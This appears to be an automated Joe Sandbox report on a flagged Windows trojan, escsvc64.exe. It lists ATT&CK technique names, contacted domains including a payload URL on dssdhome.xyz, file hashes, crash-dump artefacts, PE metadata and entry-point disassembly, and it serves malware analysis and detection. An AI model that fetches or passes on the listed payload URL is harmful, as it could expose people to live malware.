Credentials	Domains	Default Accounts	12 Service Execution	1 DLL Side-Loading	1 Process Injection	1 Process Injection	LSASS Memory	1 Query Registry	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Native API	Logon Script (Windows)	1 DLL Side-Loading	2 Obfuscated Files or Information	Security Account Manager	41 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	2 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Peripheral Device Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
escsvc64.exe	7%	Virustotal		Browse

Source	Detection	Scanner	Label
https://www.dssdhome.xyz/	0%	Avira URL Cloud	safe
https://www.dssdhome.xyz/11/xin/escsvc64.jpg	0%	Avira URL Cloud	safe
https://www.dssdhome.xyz/11/xin/escsvc64.jpg.	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mooscc.b-cdn.net	169.150.247.36	true	false		unknown
www.dssdhome.xyz	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.dssdhome.xyz/11/xin/escsvc64.jpg	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.3.dr	false		high
https://www.dssdhome.xyz/	escsvc64.exe, 00000000.00000002.1859925957.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1712742415.00000000004C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.v	escsvc64.exe, 00000000.00000002.1859925957.00000000004FD000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1712742415.0000000000514000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dssdhome.xyz/11/xin/escsvc64.jpg.	escsvc64.exe, 00000000.00000002.1859925957.00000000004EB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
169.150.247.36	mooscc.b-cdn.net	United States		2711	SPIRITTEL-ASUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590615
Start date and time:	2025-01-14 11:20:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	escsvc64.exe
Detection:	MAL
Classification:	mal52.troj.winEXE@2/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 13 Number of non-executed functions: 78
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.190.159.2, 4.175.87.197, 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:21:00	API Interceptor	1x Sleep call for process: escsvc64.exe modified
05:21:14	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
169.150.247.36	https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1E	Get hash	malicious	Unknown	Browse	security1.b-cdn.net/
	https://softworldinc.wpengine.com	Get hash	malicious	Unknown	Browse	cdn.rawgit.com/michalsnik/aos/2.1.1/dist/aos.js
	http://office365secure-thresholdacoustics-q5cdxz-my-sharepoint-com.b-cdn.net	Get hash	malicious	Unknown	Browse	office365secure-thresholdacoustics-q5cdxz-my-sharepoint-com.b-cdn.net/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mooscc.b-cdn.net	EBAbsk8ydv.exe	Get hash	malicious	Unknown	Browse	169.150.247.37
mooscc.b-cdn.net	EBAbsk8ydv.exe	Get hash	malicious	Unknown	Browse	169.150.247.38

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPIRITTEL-ASUS	Absa Remittance Advice.docx	Get hash	malicious	Unknown	Browse	169.150.255.184
	https://ipfs.fleek.co/ipfs/QmdUyj8NpxbikpMGxJdqQYKUS1Hhtm58Ji4zJDUeKEWSbd?filename=btcindex.html/	Get hash	malicious	Unknown	Browse	169.150.247.39
	https://ipfs.io/ipfs/QmdUyj8NpxbikpMGxJdqQYKUS1Hhtm58Ji4zJDUeKEWSbd?filename=btcindex.html/	Get hash	malicious	Unknown	Browse	169.150.247.36
	https://fleek.ipfs.io/ipfs/QmdUyj8NpxbikpMGxJdqQYKUS1Hhtm58Ji4zJDUeKEWSbd?filename=btcindex.html/	Get hash	malicious	Unknown	Browse	169.150.247.38
	http://id1223.adsalliance.xyz	Get hash	malicious	Unknown	Browse	169.150.252.209
	DOCS974i7C63.pdf	Get hash	malicious	HTMLPhisher	Browse	169.150.236.104
	DOCS974i7C63.pdf	Get hash	malicious	HTMLPhisher	Browse	169.150.247.36
	https://lttechnologies12.com/a/default/	Get hash	malicious	Unknown	Browse	169.150.236.104
	https://maya-lopez.filemail.com/t/XhcWEjoR	Get hash	malicious	Unknown	Browse	169.150.236.105
	http://atozpdfbooks.com	Get hash	malicious	Unknown	Browse	169.150.255.183

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	random.exe	Get hash	malicious	LummaC	Browse	169.150.247.36
	random.exe	Get hash	malicious	LummaC	Browse	169.150.247.36
	yTRd6nkLWV.exe	Get hash	malicious	LummaC	Browse	169.150.247.36
	XhlpAnBmIk.exe	Get hash	malicious	LummaC	Browse	169.150.247.36
	k7h8uufe6Y.exe	Get hash	malicious	LummaC	Browse	169.150.247.36
	G7T8lHJWWM.exe	Get hash	malicious	LummaC	Browse	169.150.247.36
	92.255.57_2.112.ps1	Get hash	malicious	LummaC	Browse	169.150.247.36
	8e8JUOzOjR.exe	Get hash	malicious	DBatLoader	Browse	169.150.247.36
	UTstKgkJNY.exe	Get hash	malicious	DBatLoader	Browse	169.150.247.36
	On9ahUpI4R.exe	Get hash	malicious	DBatLoader	Browse	169.150.247.36

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_escsvc64.exe_53d1627f168be861b92b51d2acfa94936fb4840_2aa0144e_6a1a781b-ddbc-435f-b849-a383447a581f\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9388373489905867
Encrypted:	false
SSDEEP:	96:2z4yLFBbkh6os0A1+i4nuQXIDcQfc6K/cEScw3Q+HbHg/8BRTf3o8Fa9KLnNFhO7:c7LLbkh6o/0x2INjQT3zuiFZZ24lO8g
MD5:	0A19980AC7FF281250E2FC7231A6655A
SHA1:	DBD2EC9B5FFFDEC38F512A269EF48D3453832FAC
SHA-256:	5896B16D7B5887B3CC0A2974B18CEC145CDD976E9D906DAFCC86A377EF7D1054
SHA-512:	40078A52658D7119B2F2C5D58FC33458C59B26B3E583A51DF6A17864DF034628365D78D4EE8DBBAED94F06C65092099BA7F0F68150D2486432616D8ED76CEB7D
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.3.2.3.6.6.0.8.1.2.6.2.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.3.2.3.6.6.1.2.0.3.2.4.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.1.a.7.8.1.b.-.d.d.b.c.-.4.3.5.f.-.b.8.4.9.-.a.3.8.3.4.4.7.a.5.8.1.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.0.3.6.7.c.8.3.-.9.f.f.2.-.4.0.3.0.-.a.7.5.8.-.0.d.6.2.0.5.6.8.d.1.2.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.s.c.s.v.c.6.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.s.c.S.v.c.6.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.1.0.-.0.0.0.1.-.0.0.1.4.-.f.b.8.f.-.b.9.0.0.6.e.6.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.9.7.e.7.5.6.0.5.1.d.b.7.7.3.8.a.6.a.c.3.f.6.4.d.c.8.0.e.2.9.0.0.0.0.0.0.0.0.0.!.0.0.0.0.e.0.e.3.0.f.4.9.e.8.2.5.0.5.c.a.f.9.e.7.8.5.2.a.1.0.7.1.b.b.c.e.8.1.d.8.f.c.d.c.!.e.s.c.s.v.c.6.4...e.x.e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA819.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Tue Jan 14 10:21:00 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	114470
Entropy (8bit):	2.0762185889942404
Encrypted:	false
SSDEEP:	384:z509BHSJJTN/K49OBksMYhLEndFAFFEx7ooyrea2KwoHXnc9bKGZ:y9lSDTVF9OBk4hLEjx7ooePLSe
MD5:	34F8FAC8E7D3C2D629E2F2BCC3E942BD
SHA1:	105454001BD983A57109CE3FED443A573D003C02
SHA-256:	90E37D3A88F2541F2F6146BB3587BA250F606ACEB89B38D1565CED498C30B711
SHA-512:	650DDF783943F8C2A510BF6388ED797D33E33026BD7916C8682E207F10CFADD79E2B9869FA73CFC4F77FF531A70F0E90035C721F6B97B2954045A6D3398D1A08
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........:.g............$...........D...D.......$............................X..........l.......8...........T............5..............8/..........$1..............................................................................eJ.......1......Lw......................T............:.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8E5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8714
Entropy (8bit):	3.7012212286252932
Encrypted:	false
SSDEEP:	192:R6l7wVeJfk9m6Dt6Y9NBIgmfNuprp89bIAEfSQYm:R6lXJ8/Dt6YXBIgmfNtIrfS2
MD5:	5D799804E6A93E6F51BD1B939A1D5705
SHA1:	F4C359E408B12CB4A9041E325C469A7434E90AE4
SHA-256:	FDB03CAA70FF9326EC1E043387AAA8A5D4E23686528F73A3B7FE5C448F8BAFBA
SHA-512:	892725033F130F8A771775202FD15E265CD86DF9E7AF2D876FCD72CEE124045CFBD7F9864D1E7A4381DB7D4AEADB8C473D4BA57ECD579FC75D09F93377346B2A
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA915.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4690
Entropy (8bit):	4.43840393174553
Encrypted:	false
SSDEEP:	48:cvIwWl8zsBJg771I9z4WpW8VYcEYm8M4JnUFqyq85bWpWrrkIJDwMdd:uIjfTI7Ax7V1JzXpWrrkYLdd
MD5:	18018D70DAE4CC15C2B6D0116530624B
SHA1:	92498F970ECF43CF09F20E0407D60B1A32E5ECBB
SHA-256:	FAB8A16E9CABD519EF18D4F1A7A6DDA757C616863BDC2864D4112B261C2101BD
SHA-512:	912030CFA76EE3943C04B379B5BB127B9874B2B337645D12A27FD8D4BA3EB9BCB862C77A8EE7413D239C4E1D8432B626B50F6CEAA18D04042205FB4C417C8772
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="675443" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465647517326975
Encrypted:	false
SSDEEP:	6144:yIXfpi67eLPU9skLmb0b4LWSPKaJG8nAgejZMMhA2gX4WABl0uNFdwBCswSbg:3XD94LWlLZMM6YFHH+g
MD5:	ACC61E01842FEDC77AEFDD703E299DE3
SHA1:	7120F9B07D2CC948D89513EB5E569FAB53471D3D
SHA-256:	3463AEFA1058A50912DA9DB16960AD6940C185247995017EB81941C9185123F5
SHA-512:	5207B03CDFC7042EAB0C3F2475193874904E73F2BEBA270FC9B81287C707E29D27A3387C8DC3421EE6F01608B3D87710DFD5FB9F1E65D3600F540061F33C7CEC
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmzt8.nf................................................................................................................................................................................................................................................................................................................................................/6........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	5.960564454003527
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	escsvc64.exe
File size:	144'560 bytes
MD5:	525ea9523a2afe76d2eaebc4a6b923eb
SHA1:	e0e30f49e82505caf9e7852a1071bbce81d8fcdc
SHA256:	53c772ca6258ee6a1d53be5e66554d0793f92c631760f1e3ed31366ef4fccba7
SHA512:	3e2e521881f044adf82f380ed10d7eb217ec252a33f9cb146249e6bf8d5aabc2934f3ac67b0bc0fab431dbcb18e153632896c3b63358c27d9233485f14cbd61c
SSDEEP:	3072:L507+DpnZ7olJZm4AyU0Rc4OSSIfO0mZxQeUF53Gbph1s27T:u72zMnQ4gWc4btfO02xi/Gbph1R7T
TLSH:	7CE3C492621044A4F75A47349952E5D597A57C3807E4E3CFE238BE362E322D36E3B24F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.B..g,N.g,N.g,N:.QN.g,N:.BN6g,N:.WN.g,N.g-N.g,N:.AN{g,N:.^N.g,N:.PN.g,N:.TN.g,NRich.g,N........PE..d......O..........#........

File Icon


Icon Hash:	8a80809292808001

Static PE Info

General

Entrypoint:	0x140003580
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4FB4DD14 [Thu May 17 11:12:20 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	90807f1f3b7b31817516f1c58a60288f

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/07/2011 01:00:00 13/07/2012 00:59:59
Subject Chain	CN=SEIKO EPSON Corporation, OU=Information Service & Support Department, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=SEIKO EPSON Corporation, L=Suwa-shi, S=Nagano, C=JP
Version:	3
Thumbprint MD5:	CA608B34C5C7033C02C006EFF7FC9775
Thumbprint SHA-1:	FBE1BDFDB27AA07A4EBE3E97A22F07BC6C70250F
Thumbprint SHA-256:	507DFC2E866302C1089DB07CDBCEE0AD034A3F8A335DA0DDA1AD508E26436A9A
Serial:	7524DBFE413001B3B345768A4F60DF46

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F5FFC4D2FCCh
dec eax
add esp, 28h
jmp 00007F5FFC4CDA03h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
mov edx, 00000008h
lea ecx, dword ptr [edx+18h]
call 00007F5FFC4D3182h
dec eax
mov ecx, eax
dec eax
mov ebx, eax
call 00007F5FFC4D04C7h
dec eax
test ebx, ebx
dec eax
mov dword ptr [00015190h], eax
dec eax
mov dword ptr [00015181h], eax
jne 00007F5FFC4CDCFBh
lea eax, dword ptr [ebx+18h]
dec eax
add esp, 20h
pop ebx
ret
dec eax
mov dword ptr [ebx], 00000000h
xor eax, eax
dec eax
add esp, 20h
pop ebx
ret
int3
int3
int3
int3
int3
int3
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], esi
dec eax
mov dword ptr [esp+18h], edi
inc ecx
push esp
inc ecx
push ebp
inc ecx
push esi
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
call 00007F5FFC4D1504h
nop
dec eax
mov ecx, dword ptr [0001513Fh]
call 00007F5FFC4D0627h
dec esp
mov ebp, eax
dec eax
mov ecx, dword ptr [00015128h]
call 00007F5FFC4D0618h
dec eax
mov esi, eax
dec ecx
cmp eax, ebp
jc 00007F5FFC4CDD8Ch
dec eax
mov edi, eax
dec ecx
sub edi, ebp
dec esp
lea esi, dword ptr [edi+08h]
dec ecx
cmp esi, 08h

Rich Headers

Programming Language:

[ASM] VS2005 build 50727
[C++] VS2005 build 50727
[IMP] VS2005 build 50727
[ C ] VS2005 build 50727
[RES] VS2005 build 50727
[LNK] VS2005 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x13718	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a000	0xc390	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x19000	0xf9c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x21800	0x1cb0	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x10450	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x10000	0x3d8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xe400	0xe400	312b0cc7903c77314065737aa0b6f840	False	0.5623629385964912	data	6.434210349442922	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x10000	0x4434	0x4600	0c1cbce9edc1dd89be5cc3a37d2c98eb	False	0.382421875	data	5.262140167496945	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x15000	0x3780	0x1600	29743b577f64cf1dd6827d8241e7bc32	False	0.16459517045454544	data	1.9076248479232016	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x19000	0xf9c	0x1000	dcbd733158aa416708b06ffa52c15e3e	False	0.477783203125	data	4.8653578721712645	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x1a000	0xc390	0xc400	933c8a2922c9e09da0bbdc4dcc5f3b3f	False	0.134765625	data	4.424711281922116	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1a430	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	United States	0.14650537634408603
RT_ICON	0x1a718	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	United States	0.30405405405405406
RT_ICON	0x1a840	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.3070362473347548
RT_ICON	0x1b6e8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.4842057761732852
RT_ICON	0x1bf90	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.3670520231213873
RT_ICON	0x1c4f8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.1087136929460581
RT_ICON	0x1eaa0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.23170731707317074
RT_ICON	0x1fb48	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.3599290780141844
RT_ICON	0x1ffb0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	United States	0.14650537634408603
RT_ICON	0x20298	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	United States	0.30405405405405406
RT_ICON	0x203c0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.3070362473347548
RT_ICON	0x21268	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.4842057761732852
RT_ICON	0x21b10	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.3670520231213873
RT_ICON	0x22078	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.1087136929460581
RT_ICON	0x24620	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.23170731707317074
RT_ICON	0x256c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.3599290780141844
RT_GROUP_ICON	0x25b30	0x76	data	English	United States	0.6440677966101694
RT_GROUP_ICON	0x25ba8	0x76	data	English	United States	0.6610169491525424
RT_VERSION	0x25c20	0x2f8	data	English	United States	0.4631578947368421
RT_MANIFEST	0x25f18	0x475	ASCII text, with CRLF line terminators	English	United States	0.4539877300613497

Imports

DLL	Import
KERNEL32.dll	CreateFileA, lstrcmpW, WaitForSingleObject, OpenProcess, lstrcmpiW, lstrcpynW, Sleep, GetTickCount, GetModuleFileNameW, CloseHandle, WaitForMultipleObjects, CreateEventW, SetEvent, GetLastError, LocalFree, GetCommandLineW, lstrlenW, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, HeapReAlloc, InitializeCriticalSection, LoadLibraryA, SetEnvironmentVariableW, SetEnvironmentVariableA, CompareStringW, CompareStringA, HeapFree, GetVersionExA, HeapAlloc, GetProcessHeap, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlCaptureContext, RtlVirtualUnwind, RtlLookupFunctionEntry, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetModuleHandleA, GetProcAddress, FlsGetValue, FlsSetValue, TlsFree, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, MultiByteToWideChar, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, ExitProcess, RtlUnwindEx, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, WriteFile, GetStdHandle, GetModuleFileNameA, GetCommandLineA, SetHandleCount, GetFileType, GetStartupInfoA, HeapSetInformation, HeapCreate, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapSize, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers
USER32.dll	UnregisterDeviceNotification, RegisterDeviceNotificationW
